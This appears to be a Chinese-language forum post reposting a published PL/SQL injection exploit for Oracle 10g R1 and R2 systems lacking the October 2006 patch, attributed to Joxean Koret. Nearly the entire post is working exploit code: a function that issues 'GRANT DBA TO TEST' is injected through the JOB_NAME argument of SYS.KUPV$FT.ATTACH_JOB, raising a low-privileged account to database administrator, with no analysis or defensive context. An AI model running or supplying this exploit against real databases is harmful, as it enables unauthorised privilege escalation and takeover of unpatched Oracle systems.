发新话题
打印

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

Oracle 10g SYS.KUPV$FT.ATTACH_JOB PL/SQL Injection Exploit

复制内容到剪贴板
代码:
/**
* Exploit for Oracle10g R1 and R2 prior to CPU Oct 2006
* Joxean Koret <[email]joxeankoret@yahoo.es[/email]>
* Privileges needed:
*
* - EXECUTE_CATALOG_ROLE
* - CREATE PROCEDURE
*
*/
select *
from user_role_privs
;

CREATE OR REPLACE FUNCTION F1
RETURN NUMBER AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE &#39;GRANT DBA TO TEST&#39;;
COMMIT;
RETURN(1);
END;
/

DECLARE
USER_NAME VARCHAR2(200);
JOB_NAME VARCHAR2(200);
NEW_JOB BOOLEAN;
v_Return NUMBER;
BEGIN
USER_NAME := &#39;OWNER&#39;;
JOB_NAME := &#39;&#39;&#39; OR &#39; || USER || &#39;.f1() = 1--&#39;;

v_Return := SYS.KUPV$FT.ATTACH_JOB(
USER_NAME => USER_NAME,
JOB_NAME => JOB_NAME,
NEW_JOB => NEW_JOB
);
END;
/

TOP

发新话题